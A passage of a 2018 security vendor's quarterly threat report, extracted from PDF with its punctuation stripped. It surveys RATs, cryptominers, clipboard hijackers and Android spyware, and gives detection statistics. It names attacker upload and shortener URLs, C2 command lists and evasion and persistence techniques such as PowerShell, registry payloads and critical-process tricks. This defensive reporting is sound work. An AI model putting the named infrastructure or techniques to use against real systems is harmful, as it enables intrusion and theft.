The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
